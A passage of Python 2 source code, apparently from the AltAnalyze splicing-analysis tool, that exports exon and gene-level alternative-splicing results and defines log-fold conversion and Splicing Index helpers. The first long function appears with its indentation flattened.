except KeyError: protein_exon_feature_db2[affygene,attribute]=[exon]
### Add functional attribute information to a new database
"""Database not used for exon/junction data export but for over-representation analysis (direction specific)"""
for item in microRNA_exon_feature_list:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: microRNA_exon_feature_db2[affygene,attribute].append(exon)
except KeyError: microRNA_exon_feature_db2[affygene,attribute]=[exon]
### Add functional attribute information to a new database
for item in functional_attribute_list2:
attribute = item[0]
exon = item[1]
if (float((lowest_raw_p))<=p_threshold or false_pos < 2) or lowest_raw_p == 1 or lowest_raw_p == 'NA':
try: functional_attribute_db2[affygene,attribute].append(exon)
except KeyError: functional_attribute_db2[affygene,attribute]=[exon]
try:
abs_fold = abs(float(mean_fold_change)); fold_direction = 'down'; fold1_direction = 'down'; fold2_direction = 'down'
large_splicing_diff1 = 0; large_splicing_diff2 = 0; large_splicing_diff = 'null'; opposite_splicing_pattern = 'no'
if float(mean_fold_change)>0: fold_direction = 'up'
if float(fold1)>0: fold1_direction = 'up'
if fold1_direction != fold_direction:
if float(fold1)>float(mean_fold_change): large_splicing_diff1 = float(fold1)-float(mean_fold_change)
except Exception:
fold_direction = ''; large_splicing_diff = ''; opposite_splicing_pattern = ''
if analysis_method != 'ASPIRE' and 'linearregres' not in analysis_method: ed = exon_db[probeset1]
else:
try: ed = critical_probeset_annotation_db[selected_probeset,probeset2]
except KeyError:
try: ed = exon_db[selected_probeset] ###not useful data here, but the objects need to exist
except IOError: ed = original_exon_db[probeset1]
ucsc_splice_annotations = ["retainedIntron","cassetteExon","strangeSplice","altFivePrime","altThreePrime","altPromoter","bleedingExon"]
custom_annotations = ["alt-3'","alt-5'","alt-C-term","alt-N-term","cassette-exon","cassette-exon","exon-region-exclusion","intron-retention","mutually-exclusive-exon","trans-splicing"]
custom_exon_annotations_found='no'; ucsc_annotations_found = 'no'; exon_annot_score=0
if len(ed.SplicingEvent())>0:
for annotation in ucsc_splice_annotations:
if annotation in ed.SplicingEvent(): ucsc_annotations_found = 'yes'
for annotation in custom_annotations:
if annotation in ed.SplicingEvent(): custom_exon_annotations_found = 'yes'
if custom_exon_annotations_found == 'yes' and ucsc_annotations_found == 'no': exon_annot_score = 3
elif ucsc_annotations_found == 'yes' and custom_exon_annotations_found == 'no': exon_annot_score = 4
elif ucsc_annotations_found == 'yes' and custom_exon_annotations_found == 'yes': exon_annot_score = 5
else: exon_annot_score = 2
try: gene_splice_event_score[affygene].append(exon_annot_score) ###store for gene level results
except KeyError: gene_splice_event_score[affygene] = [exon_annot_score]
try: gene_exon_region[affygene].append(ed.ExonRegionID()) ###store for gene level results
except KeyError: gene_exon_region[affygene] = [ed.ExonRegionID()]
if analysis_method == 'ASPIRE' or 'linearregres' in analysis_method:
if float(fold2)>0: fold2_direction = 'up'
if fold2_direction != fold_direction:
if float(fold2)>float(mean_fold_change):
large_splicing_diff2 = float(fold2)-float(mean_fold_change)
if abs(large_splicing_diff2) > large_splicing_diff1: large_splicing_diff = str(large_splicing_diff2)
else: large_splicing_diff = str(large_splicing_diff1)
if fold1_direction != fold2_direction and abs(float(fold1))>0.4 and abs(float(fold2))>0.4 and abs(float(mean_fold_change))< max([float(fold2),float(fold1)]):
opposite_splicing_pattern = 'yes'
### Annotate splicing events based on exon_strucuture data
if array_type == 'AltMouse':
extra_exon_annotation = ExonAnnotate_module.annotate_splice_event(exons1,exons2,extra_transcript_annotation)
try: splice_event_db[extra_exon_annotation] += 1
except KeyError: splice_event_db[extra_exon_annotation] = 1
try:
direct_domain_alignments = probeset_aligning_db[selected_probeset,probeset2]
try: direct_domain_gene_alignments[affygene]+=', '+direct_domain_alignments
except KeyError: direct_domain_gene_alignments[affygene]=direct_domain_alignments
except KeyError: direct_domain_alignments = ' '
splicing_event = ed.SplicingEvent()
if array_type == 'RNASeq':
splicing_event = checkForTransSplicing(probeset1_display,splicing_event)
splicing_event = checkForTransSplicing(probeset2,splicing_event)
exp1 = covertLogExpressionToNonLog(exp1)
exp2 = covertLogExpressionToNonLog(exp2)
baseline_const_exp = covertLogExpressionToNonLog(baseline_const_exp)
fold1 = covertLogFoldToNonLog(fold1)
fold2 = covertLogFoldToNonLog(fold2)
adjfold1 = covertLogFoldToNonLog(adjfold1)
adjfold2 = covertLogFoldToNonLog(adjfold2)
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
### Annotate splicing events based on pre-computed and existing annotations
values= [affygene,dI,symbol,fs(description),exons1,exons2,regulation_call,event_call,probeset1_display,rawp1,probeset2,rawp2,fold1,fold2,adjfold1,adjfold2]
values+=[extra_transcript_annotation,up_exons,down_exons,fs(new_functional_attribute_str),fs(new_uniprot_exon_feature_str),fs(seq_attribute_str),exp1,exp2,fs(direct_domain_alignments)]
values+=[str(baseline_const_exp),str(lowest_raw_p),p_value_extra,str(false_pos),mean_fold_change,extra_exon_annotation]
values+=[ed.ExternalExonIDs(),ed.ExonRegionID(),splicing_event,str(exon_annot_score),large_splicing_diff,location_summary]
exon_sets = abs(float(dI)),regulation_call,event_call,exons1,exons2,''
### Export significant reciprocol junction pairs and scores
values_ps = [probeset1+'|'+probeset2,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_ps = string.join(values_ps,'\t')+'\n'
try: ProcessedSpliceData_data.write(values_ps)
except Exception: None
values_ge = [affygene,'En',dI,str(lowest_raw_p),symbol,probeset1_display+' | '+probeset2]; values_ge = string.join(values_ge,'\t')+'\n'
if array_type == 'junction' or array_type == 'RNASeq': ### Only applies to reciprocal junction sensitive platforms (but not currently AltMouse)
goelite_data.write(values_ge)
if array_type == 'junction' or array_type == 'RNASeq': ### Only applies to reciprocal junction sensitive platforms (but not currently AltMouse)
try: exon_probeset = exon_array_translation_db[affygene+':'+exon_data[1][0]][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1 = None #probeset1 = affygene+':'+exon_data[1][0]
try:
null = int(probeset1) ### Must be an int to work in DomainGraph
values_dg = [probeset1,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_dg = string.join(values_dg,'\t')+'\n'
if array_type == 'junction' or array_type == 'RNASeq':
DG_data.write(values_dg)
values_srf = string.join([probeset1,'Ae',dI,str(lowest_raw_p)],'\t')+'\n'
if float(dI)>0:
SRFinder_ex_data.write(values_srf)
elif float(dI)<0:
SRFinder_in_data.write(values_srf)
except Exception: null=[]
else:
si_pvalue = lowest_raw_p
if si_pvalue == 1: si_pvalue = 'NA'
if probeset1 in midas_db:
midas_p = str(midas_db[probeset1])
if float(midas_p)<lowest_raw_p: lowest_raw_p = float(midas_p) ###This is the lowest and SI-pvalue
else: midas_p = ''
###Determine what type of exon-annotations are present to assign a confidence score
if affygene in annotate_db: ###Determine the transcript clusters used to comprise a splice event (genes and exon specific)
try:
gene_tc = annotate_db[affygene].TranscriptClusterIDs()
try: probeset_tc = [ed.SecondaryGeneID()]
except Exception: probeset_tc = [affygene]
for transcript_cluster in gene_tc: probeset_tc.append(transcript_cluster)
probeset_tc = makeUnique(probeset_tc)
except Exception: probeset_tc = ''; gene_tc=''
else:
try:
try: probeset_tc = [ed.SecondaryGeneID()]
except Exception: probeset_tc = [affygene]
probeset_tc = makeUnique(probeset_tc)
except Exception: probeset_tc = ''; gene_tc=''
cluster_number = len(probeset_tc)
try: alternatively_reg_tc[affygene] += probeset_tc
except KeyError: alternatively_reg_tc[affygene] = probeset_tc
try: last_exon_region = last_exon_region_db[affygene]
except KeyError: last_exon_region = ''
if cluster_number>1: exon_annot_score = 1
direct_domain_alignments = ' '
if array_type == 'exon' or array_type == 'gene' or explicit_data_type != 'null':
try:
direct_domain_alignments = probeset_aligning_db[probeset1]
try: direct_domain_gene_alignments[affygene]+=', '+direct_domain_alignments
except KeyError: direct_domain_gene_alignments[affygene]=direct_domain_alignments
except KeyError: direct_domain_alignments = ' '
else:
try: direct_domain_alignments = probeset_aligning_db[affygene+':'+exons1]
except KeyError: direct_domain_alignments = ''
if array_type == 'RNASeq':
exp1 = covertLogExpressionToNonLog(exp1)
baseline_const_exp = covertLogExpressionToNonLog(baseline_const_exp)
fold1 = covertLogFoldToNonLog(fold1)
adjfold1 = covertLogFoldToNonLog(adjfold1)
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
try: adj_SIp=fdr_exon_stats[probeset1].AdjP()
except Exception: adj_SIp = 'NA'
try: secondary_geneid = ed.SecondaryGeneID()
except Exception: secondary_geneid = affygene
if array_type == 'RNASeq':
secondary_geneid = ed.NovelExon()
### Write Splicing Index results
values= [affygene,dI,symbol,fs(description),exons1,regulation_call,probeset1,rawp1,str(lowest_raw_p),midas_p,fold1,adjfold1]
values+=[up_exons,down_exons,fs(new_functional_attribute_str),fs(new_uniprot_exon_feature_str),fs(seq_attribute_str),fs(direct_domain_alignments),exp1]
values+=[str(baseline_const_exp),str(si_pvalue),DV,mean_fold_change,secondary_geneid, ed.ExternalExonIDs()]
values+=[ed.Constitutive(),ed.ExonRegionID(),ed.SplicingEvent(),last_exon_region,ed.LocationSummary()] #str(exon_annot_score)
if probeset1 in filtered_probeset_db: values += filtered_probeset_db[probeset1]
exon_sets = abs(float(dI)),regulation_call,event_call,exons1,exons1,midas_p
probeset = probeset1 ### store original ID (gets converted below)
### Write DomainGraph results
try: midas_p = str(midas_db[probeset1])
except KeyError: midas_p = 'NA'
### Export significant exon/junction IDs and scores
values_ps = [probeset1,affygene,'changed',dI,'NA',str(lowest_raw_p)]; values_ps = string.join(values_ps,'\t')+'\n'
try: ProcessedSpliceData_data.write(values_ps)
except Exception: None
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
if (array_type == 'junction' or array_type == 'RNASeq') and explicit_data_type == 'null':
try: exon_probeset = exon_array_translation_db[affygene+':'+exon_data[1][0]][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1 = None ### don't write out a line
else:
try: exon_probeset = exon_array_translation_db[probeset1][0]; probeset1 = exon_probeset; gcn+=1
except Exception: probeset1=None; #null=[]; #print gcn, probeset1;kill - force an error - new in version 2.0.8
try:
null = int(probeset1)
values_dg = [probeset1,affygene,'changed',dI,str(si_pvalue),midas_p]; values_dg = string.join(values_dg,'\t')+'\n'
DG_data.write(values_dg)
values_srf = string.join([probeset1,'Ae',dI,str(lowest_raw_p)],'\t')+'\n'
if float(dI)>0:
SRFinder_ex_data.write(values_srf)
elif float(dI)<0:
SRFinder_in_data.write(values_srf)
except Exception: null=[]
values_ge = [affygene,'En',dI,str(si_pvalue),midas_p,symbol,probeset]; values_ge = string.join(values_ge,'\t')+'\n'
goelite_data.write(values_ge)
if len(ed.SplicingEvent())>2:
try: external_exon_annot[affygene].append(ed.SplicingEvent())
except KeyError: external_exon_annot[affygene] = [ed.SplicingEvent()]
try: values = string.join(values,'\t')+'\n'
except Exception: print values;kill
data.write(values)
###Process data for gene level reports
if float((lowest_raw_p))<=p_threshold or false_pos < 2 or lowest_raw_p == 1:
try: comparison_count[affygene] += 1
except KeyError: comparison_count[affygene] = 1
try: aspire_gene_results[affygene].append(exon_sets)
except KeyError: aspire_gene_results[affygene] = [exon_sets]
for exon in up_exon_list:
exon_info = exon,'upregulated'
try: critical_gene_exons[affygene].append(exon_info)
except KeyError: critical_gene_exons[affygene] = [exon_info]
for exon in down_exon_list:
exon_info = exon,'downregulated'
try: critical_gene_exons[affygene].append(exon_info)
except KeyError: critical_gene_exons[affygene] = [exon_info]
data.close()
print event_count, analysis_method, "results written to:", aspire_output,'\n'
try: clearObjectsFromMemory(original_exon_db)
except Exception: null=[]
exon_array_translation_db=[]; original_exon_db=[]; probeset_to_gene=[]
### Finish writing the DomainGraph export file with non-significant probesets
if array_type != 'AltMouse':
for probeset in excluded_probeset_db:
eed = excluded_probeset_db[probeset]
try: midas_p = str(midas_db[probeset])
except KeyError: midas_p = 'NA'
### Export significant exon/junction IDs and scores
try: values_ps = [probeset,eed.GeneID(),'UC',eed.Score(),str(eed.TTestNormalizedRatios()),midas_p]
except Exception: excl_probeset, geneid, score, rawp, pvalue = eed; values_ps = [probeset,geneid,'UC', str(score), str(rawp), str(pvalue)]
values_ps = string.join(values_ps,'\t')+'\n'; ProcessedSpliceData_data.write(values_ps)
### Write DomainGraph results
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
try: exon_probeset = exon_array_translation_db[probeset][0]; probeset = exon_probeset; gcn+=1
except Exception: probeset=None; # null=[] - force an error - new in version 2.0.8
try: values_dg = [probeset,eed.GeneID(),'UC',eed.Score(),str(eed.TTestNormalizedRatios()),midas_p]
except Exception:
try:
excl_probeset, geneid, score, rawp, pvalue = eed
if ':' in probeset: probeset = excl_probeset ### Example: ENSMUSG00000029213:E2.1, make this just the numeric exclusion probeset - Not sure if DG handles non-numeric
values_dg = [probeset,geneid,'UC', str(score), str(rawp), str(pvalue)]
except Exception: None
try:
null=int(probeset)
values_dg = string.join(values_dg,'\t')+'\n'; DG_data.write(values_dg)
except Exception: null=[]
if array_type == 'gene' or array_type == 'junction' or array_type == 'RNASeq':
for id in exon_array_translation_db:
SRFinder_denom_data.write(exon_array_translation_db[id]+'\tAe\n')
else:
for probeset in original_exon_db:
SRFinder_denom_data.write(probeset+'\tAe\n')
DG_data.close()
SRFinder_in_data.close()
SRFinder_ex_data.close()
SRFinder_denom_data.close()
for affygene in direct_domain_gene_alignments:
domains = string.split(direct_domain_gene_alignments[affygene],', ')
domains = unique.unique(domains); domains = string.join(domains,', ')
direct_domain_gene_alignments[affygene] = domains
### functional_attribute_db2 will be reorganized so save the database with another. Use this
functional_attribute_db = functional_attribute_db2
functional_attribute_db2 = reorganize_attribute_entries(functional_attribute_db2,'no')
external_exon_annot = eliminate_redundant_dict_values(external_exon_annot)
protein_exon_feature_db = protein_exon_feature_db2
protein_exon_feature_db2 = reorganize_attribute_entries(protein_exon_feature_db2,'no')
############ Export Gene Data ############
up_splice_val_genes = 0; down_dI_genes = 0; diff_exp_spliced_genes = 0; diff_spliced_rna_factor = 0
ddI = 0; udI = 0
summary_data_db['direct_domain_genes']=len(direct_domain_gene_alignments)
summary_data_db['alt_genes']=len(aspire_gene_results)
critical_gene_exons = eliminate_redundant_dict_values(critical_gene_exons)
aspire_output_gene = root_dir+'AltResults/AlternativeOutput/' + dataset_name + analysis_method + '-exon-inclusion-GENE-results.txt'
data = export.ExportFile(aspire_output_gene)
if array_type == 'AltMouse': goelite_data.write("GeneID\tSystemCode\n")
title = ['AffyGene','max_dI','midas-p (corresponding)','symbol','external gene ID','description','regulation_call','event_call']
title +=['number_of_comparisons','num_effected_exons','up_exons','down_exons','functional_attribute','uniprot-ens_exon_features','direct_domain_alignments']
title +=['pathways','mean_fold_change','exon-annotations','exon-region IDs','alternative gene ID','splice-annotation score']
title = string.join(title,'\t')+'\n'
data.write(title)
for affygene in aspire_gene_results:
if affygene in annotate_db:
description = annotate_db[affygene].Description()
symbol = annotate_db[affygene].Symbol()
ensembl = annotate_db[affygene].ExternalGeneID()
if array_type != 'AltMouse' and array_type != 'RNASeq': transcript_clusters = alternatively_reg_tc[affygene]; transcript_clusters = makeUnique(transcript_clusters); transcript_clusters = string.join(transcript_clusters,'|')
else: transcript_clusters = affygene
rna_processing_factor = annotate_db[affygene].RNAProcessing()
else: description='';symbol='';ensembl=affygene;rna_processing_factor=''; transcript_clusters=''
if ensembl in go_annotations: wpgo = go_annotations[ensembl]; goa = wpgo.Combined()
else: goa = ''
if array_type == 'AltMouse':
if len(ensembl) >0: goelite_data.write(ensembl+'\tL\n')
try: gene_splice_event_score[affygene].sort(); top_se_score = str(gene_splice_event_score[affygene][-1])
except KeyError: top_se_score = 'NA'
try: gene_regions = gene_exon_region[affygene]; gene_regions = makeUnique(gene_regions); gene_regions = string.join(gene_regions,'|')
except KeyError: gene_regions = 'NA'
if analysis_method == 'ASPIRE' or analysis_method == 'linearregres': number_of_comparisons = str(comparison_count[affygene])
else: number_of_comparisons = 'NA'
results_list = aspire_gene_results[affygene]
results_list.sort(); results_list.reverse()
max_dI = str(results_list[0][0])
regulation_call = results_list[0][1]
event_call = results_list[0][2]
midas_p = results_list[0][-1]
num_critical_exons = str(len(critical_gene_exons[affygene]))
try: direct_domain_annots = direct_domain_gene_alignments[affygene]
except KeyError: direct_domain_annots = ' '
down_exons = ''; up_exons = ''; down_list=[]; up_list=[]
for exon_info in critical_gene_exons[affygene]:
exon = exon_info[0]; call = exon_info[1]
if call == 'downregulated':
down_exons = down_exons + exon + ','
down_list.append(exon)
ddI += 1
if call == 'upregulated':
up_exons = up_exons + exon + ','
up_list.append(exon)
udI += 1
down_exons = down_exons[0:-1]
up_exons = up_exons[0:-1]
up_exons = add_a_space(up_exons); down_exons = add_a_space(down_exons)
functional_annotation =''
if affygene in functional_attribute_db2:
number_of_functional_attributes = str(len(functional_attribute_db2[affygene]))
attribute_list = functional_attribute_db2[affygene]
attribute_list.sort()
for attribute_exon_info in attribute_list:
exon_attribute = attribute_exon_info[0]
exon_list = attribute_exon_info[1]
functional_annotation = functional_annotation + exon_attribute
exons = '('
for exon in exon_list: exons = exons + exon + ','
exons = exons[0:-1] + '),'
if add_exons_to_annotations == 'yes': functional_annotation = functional_annotation + exons
else: functional_annotation = functional_annotation + ','
functional_annotation = functional_annotation[0:-1]
uniprot_exon_annotation = ''
if affygene in protein_exon_feature_db2:
number_of_functional_attributes = str(len(protein_exon_feature_db2[affygene]))
attribute_list = protein_exon_feature_db2[affygene]; attribute_list.sort()
for attribute_exon_info in attribute_list:
exon_attribute = attribute_exon_info[0]
exon_list = attribute_exon_info[1]
uniprot_exon_annotation = uniprot_exon_annotation + exon_attribute
exons = '('
for exon in exon_list: exons = exons + exon + ','
exons = exons[0:-1] + '),'
if add_exons_to_annotations == 'yes': uniprot_exon_annotation = uniprot_exon_annotation + exons
else: uniprot_exon_annotation = uniprot_exon_annotation + ','
uniprot_exon_annotation = uniprot_exon_annotation[0:-1]
if len(uniprot_exon_annotation) == 0: uniprot_exon_annotation = ' '
if len(functional_annotation) == 0: functional_annotation = ' '
if affygene in gene_expression_diff_db:
mean_fold_change = gene_expression_diff_db[affygene].ConstitutiveFoldStr()
try:
if abs(float(mean_fold_change)) > log_fold_cutoff: diff_exp_spliced_genes += 1
except Exception: diff_exp_spliced_genes = diff_exp_spliced_genes
else: mean_fold_change = 'NC'
if len(rna_processing_factor) > 2: diff_spliced_rna_factor +=1
###Add annotations for where in the gene structure these exons are (according to Ensembl)
if affygene in external_exon_annot: external_gene_annot = string.join(external_exon_annot[affygene],', ')
else: external_gene_annot = ''
if array_type == 'RNASeq':
mean_fold_change = covertLogFoldToNonLog(mean_fold_change)
values =[affygene,max_dI,midas_p,symbol,ensembl,fs(description),regulation_call,event_call,number_of_comparisons]
values+=[num_critical_exons,up_exons,down_exons,functional_annotation]
values+=[fs(uniprot_exon_annotation),fs(direct_domain_annots),fs(goa),mean_fold_change,external_gene_annot,gene_regions,transcript_clusters,top_se_score]
values = string.join(values,'\t')+'\n'
data.write(values)
### Use results for summary statistics
if len(up_list)>len(down_list): up_splice_val_genes +=1
else: down_dI_genes +=1
data.close()
print "Gene-level results written"
###yes here indicates that although the truncation events will initially be filtered out, later they will be added
###back in without the non-truncation annotations....if there is no second database (in this case functional_attribute_db again)
###IF WE WANT TO FILTER OUT NON-NMD ENTRIES WHEN NMD IS PRESENT (FOR A GENE) MUST INCLUDE functional_attribute_db AS THE SECOND VARIABLE!!!!
###Currently, yes does nothing
functional_annotation_db, null = grab_summary_dataset_annotations(functional_attribute_db,'','yes')
upregulated_genes = 0; downregulated_genes = 0
###Calculate the number of upregulated and downregulated genes
for affygene in gene_expression_diff_db:
fold_val = gene_expression_diff_db[affygene].ConstitutiveFold()
try:
if float(fold_val) > log_fold_cutoff: upregulated_genes += 1
elif abs(float(fold_val)) > log_fold_cutoff: downregulated_genes += 1
except Exception: null=[]
upregulated_rna_factor = 0; downregulated_rna_factor = 0
###Calculate the total number of putative RNA-processing/binding factors differentially regulated
for affygene in gene_expression_diff_db:
gene_fold = gene_expression_diff_db[affygene].ConstitutiveFold()
rna_processing_factor = gene_expression_diff_db[affygene].RNAProcessing()
if len(rna_processing_factor) > 1:
if gene_fold>log_fold_cutoff: upregulated_rna_factor += 1
elif abs(gene_fold)>log_fold_cutoff: downregulated_rna_factor += 1
###Generate three files for downstream functional summary
### functional_annotation_db2 is output to the same function as functional_annotation_db, ranked_uniprot_list_all to get all ranked uniprot annotations,
### and ranked_uniprot_list_coding_only to get only coding ranked uniprot annotations
functional_annotation_db2, ranked_uniprot_list_all = grab_summary_dataset_annotations(protein_exon_feature_db,'','') #functional_attribute_db
null, ranked_uniprot_list_coding_only = grab_summary_dataset_annotations(protein_exon_feature_db,functional_attribute_db,'') #functional_attribute_db
functional_attribute_db=[]; protein_exon_feature_db=[]
###Sumarize changes in avg protein length for each splice event
up_protein_list=[];down_protein_list=[]; protein_length_fold_diff=[]
for [down_protein,up_protein] in protein_length_list:
up_protein = float(up_protein); down_protein = float(down_protein)
down_protein_list.append(down_protein); up_protein_list.append(up_protein)
if up_protein > 10 and down_protein > 10:
fold_change = up_protein/down_protein; protein_length_fold_diff.append(fold_change)
median_fold_diff = statistics.median(protein_length_fold_diff)
try: down_avg=int(statistics.avg(down_protein_list)); up_avg=int(statistics.avg(up_protein_list))
except Exception: down_avg=0; up_avg=0
try:
try:
down_std=int(statistics.stdev(down_protein_list)); up_std=int(statistics.stdev(up_protein_list))
except ValueError: ###If 'null' is returned fro stdev
down_std = 0;up_std = 0
except Exception:
down_std = 0;up_std = 0
if len(down_protein_list)>1 and len(up_protein_list)>1:
try:
#t,df,tails = statistics.ttest(down_protein_list,up_protein_list,2,3)
#t = abs(t);df = round(df)
#print 'ttest t:',t,'df:',df
#p = str(statistics.t_probability(t,df))
p = str(statistics.runComparisonStatistic(down_protein_list,up_protein_list,probability_statistic))
#print dataset_name,p
except Exception: p = 'NA'
if p == 1: p = 'NA'
else: p = 'NA'
###Calculate unique reciprocal isoforms for exon-inclusion, exclusion and mutual-exclusive events
unique_exon_inclusion_count=0;unique_exon_exclusion_count=0;unique_mutual_exclusive_count=0;
unique_exon_event_db = eliminate_redundant_dict_values(unique_exon_event_db)
for affygene in unique_exon_event_db:
isoform_entries = unique_exon_event_db[affygene]
possibly_redundant=[]; non_redundant=[]; check_for_redundant=[]
for entry in isoform_entries:
if entry[0] == 1: ### If there is only one regulated exon
possibly_redundant.append(entry)
else:
non_redundant.append(entry)
critical_exon_list = entry[1]
for exon in critical_exon_list:
check_for_redundant.append(exon)
for entry in possibly_redundant:
exon = entry[1][0]
if exon not in check_for_redundant:
non_redundant.append(entry)
for entry in non_redundant:
if entry[2] == 'ei-ex':
if entry[3] == 'upregulated': unique_exon_inclusion_count += 1
else: unique_exon_exclusion_count += 1
else: unique_mutual_exclusive_count += 1
udI = unique_exon_inclusion_count; ddI = unique_exon_exclusion_count; mx = unique_mutual_exclusive_count
###Add splice event information to the functional_annotation_db
for splice_event in splice_event_db:count = splice_event_db[splice_event]; functional_annotation_db.append((splice_event,count))
if analysis_method == 'splicing-index' or analysis_method == 'FIRMA': udI='NA'; ddI='NA'
summary_results_db[dataset_name[0:-1]] = udI,ddI,mx,up_splice_val_genes,down_dI_genes,(up_splice_val_genes + down_dI_genes),upregulated_genes, downregulated_genes, diff_exp_spliced_genes, upregulated_rna_factor,downregulated_rna_factor,diff_spliced_rna_factor,down_avg,down_std,up_avg,up_std,p,median_fold_diff,functional_annotation_db
result_list = exportComparisonSummary(dataset_name,summary_data_db,'log')
###Re-set this variable (useful for testing purposes)
clearObjectsFromMemory(gene_expression_diff_db)
clearObjectsFromMemory(splice_event_list); clearObjectsFromMemory(si_db); si_db=[]
clearObjectsFromMemory(fdr_exon_stats)
try: clearObjectsFromMemory(excluded_probeset_db); clearObjectsFromMemory(ex_db); ex_db=[]
except Exception: ex_db=[]
clearObjectsFromMemory(exon_db)
#clearObjectsFromMemory(annotate_db)
critical_probeset_annotation_db=[]; gene_expression_diff_db=[]; domain_associated_genes=[]; permute_p_values=[]
permute_miR_inputs=[]; seq_attribute_str=[]; microRNA_count_db=[]; excluded_probeset_db=[]; fdr_exon_stats=[]
splice_event_list=[]; critical_exon_db_len=len(critical_exon_db)#; critical_exon_db=[] deleting here will cause a global instance problem
all_domain_gene_hits=[]; gene_splice_event_score=[]; unique_exon_event_db=[]; probeset_aligning_db=[]; ranked_uniprot_list_all=[];
filtered_microRNA_exon_db=[]; permute_domain_inputs=[]; functional_annotation_db2=[]; functional_attribute_db2=[]; protein_length_list=[];
ranked_uniprot_list_coding_only=[]; miR_str=[]; permute_input_list=[]; microRNA_exon_feature_db2=[]; alternatively_reg_tc=[];
direct_domain_gene_alignments=[]; aspire_gene_results=[]; domain_gene_counts=[]; functional_annotation=[]; protein_exon_feature_db2=[];
microRNA_attribute_db=[]; probeset_mirBS_db=[]; exon_hits=[]; critical_gene_exons=[]; gene_exon_region=[]; exon_db=[]; external_exon_annot=[];
values=[]; down_protein_list=[]; functional_annotation_db=[]; protein_length_fold_diff=[]; comparison_count=[]; filtered_arrayids=[];
domain_hit_gene_count_db=[]; up_protein_list=[]; probeset_domain_db=[]
try: goelite_data.close()
except Exception: null=[]
"""
print 'local vars'
all = [var for var in locals() if (var[:2], var[-2:]) != ("__", "__")]
for var in all:
try:
if len(locals()[var])>500: print var, len(locals()[var])
except Exception: null=[]
"""
return summary_results_db, summary_results_db2, aspire_output, aspire_output_gene, critical_exon_db_len
def deviation(dI,avg_dI,stdev_dI):
    """Return the absolute z-score of dI relative to avg_dI, computed in
    non-log space, as a string.

    All three inputs are log2 fold values; each is first converted with
    covertLogFoldToNonLogFloat before the z-score is taken.
    """
    nonlog_dI = covertLogFoldToNonLogFloat(dI)
    nonlog_avg = covertLogFoldToNonLogFloat(avg_dI)
    nonlog_stdev = covertLogFoldToNonLogFloat(stdev_dI)
    z_score = (nonlog_dI - nonlog_avg) / nonlog_stdev
    return str(abs(z_score))
def covertLogExpressionToNonLog(log_val):
    """Convert a log2 expression value back to non-log space and return it
    as a string.

    Reads the module-level ``normalization_method``: for 'RPKM' the value is
    simply 2**x; otherwise 1 is subtracted, undoing a log2(x+1) transform.
    """
    unlogged = math.pow(2, float(log_val))
    if normalization_method != 'RPKM':
        unlogged -= 1
    return str(unlogged)
def covertLogFoldToNonLog(log_val):
    """Convert a log2 fold change to a signed non-log fold, returned as a string.

    Negative log folds become negative non-log folds (e.g. -1 -> '-2.0');
    non-negative folds become plain 2**x. Inputs that cannot be converted to
    float (e.g. 'NA') are passed through unchanged, stringified.
    """
    try:
        value = float(log_val)
        if value < 0:
            # -1 / 2**x for x < 0 gives the symmetric negative fold
            unlogged = -1 / math.pow(2, value)
        else:
            unlogged = math.pow(2, value)
    except Exception:
        unlogged = log_val  # non-numeric input: return as-is
    return str(unlogged)
def covertLogFoldToNonLogFloat(log_val):
    """Convert a log2 fold change to a signed non-log fold, returned as a float.

    Unlike covertLogFoldToNonLog, non-numeric input raises (ValueError from
    float()) rather than being passed through.
    """
    value = float(log_val)
    if value >= 0:
        return math.pow(2, value)
    # negative log fold: symmetric negative non-log fold
    return -1 / math.pow(2, value)
def checkForTransSplicing(uid,splicing_event):
    """Append a 'trans-splicing' annotation when a junction UID spans two genes.

    uid            -- colon-delimited junction/probeset ID (e.g. 'gene1:E1.1:gene2:E2.1');
                      more than two fields indicates a second gene may be present
    splicing_event -- existing splicing-event annotation string (may be empty)

    Returns the (possibly extended) annotation string. When the first field is
    not a substring of the second (two different gene IDs), '|trans-splicing'
    is appended. NOTE(review): when the incoming annotation is empty the result
    keeps a leading '|' ('|trans-splicing') — preserved from the original code.
    """
    # str.split replaces the Python-2-only string.split(uid, ':'); identical
    # behavior on Python 2 and also valid on Python 3.
    parts = uid.split(':')
    if len(parts) > 2:
        if parts[0] not in parts[1]:  # two different genes (prefix substring test)
            if len(splicing_event) > 0:
                splicing_event += '|trans-splicing'
            else:
                splicing_event = '|trans-splicing'
    return splicing_event
def fs(text):
    """Wrap *text* in double quotes so embedded commas survive spreadsheet export."""
    return ''.join(['"', text, '"'])
def analyzeSplicingIndex(fold_dbase):
    """The Splicing Index (SI) represents the log ratio of the exon intensities between the two tissues after normalization
    to the gene intensities in each sample: SIi = log2((e1i/g1j)/(e2i/g2j)), for the i-th exon of the j-th gene in tissue
    type 1 or 2. The splicing indices are then subjected to a t-test to probe for differential inclusion of the exon into the gene.
    In order to determine if the change in isoform expression was statistically significant, a simple two-tailed t-test was carried
    out on the isoform ratios by grouping the 10 samples from either "tumor" or "normal" tissue.
    The method ultimately producing the highest proportion of true positives was to retain only: a) exons with a DABG p-value < 0.05,
    b) genes with a signal > 70, c) exons with a log ratio between tissues (i.e., the gene-level normalized fold change) > 0.5,
    d) Splicing Index p-values < 0.005 and e) Core exons.
    Gardina PJ, Clark TA, Shimada B, Staples MK, Yang Q, Veitch J, Schweitzer A, Awad T, Sugnet C, Dee S, Davies C, Williams A, Turpaz Y.
    Alternative splicing and differential gene expression in colon cancer detected by a whole genome exon array.
    BMC Genomics. 2006 Dec 27;7:325. PMID: 17192196

    Returns (splicing_index_hash, p_value_call, permute_p_values, excluded_probeset_db):
    splicing_index_hash is a list of (SI, ExonData) tuples sorted in descending SI order,
    p_value_call is '' and permute_p_values is {} (no permutation analysis is run here).
    Relies on module-level state: exon_db, array_raw_group_values, avg_const_exp_db,
    original_avg_const_exp_db, midas_db, filter settings and output-path globals.
    """
    ### Used to restrict the analysis to a pre-selected set of probesets (e.g. those that have a specifc splicing pattern)
    if len(filtered_probeset_db)>0:
        temp_db={}
        for probeset in fold_dbase: temp_db[probeset]=[]
        for probeset in temp_db:
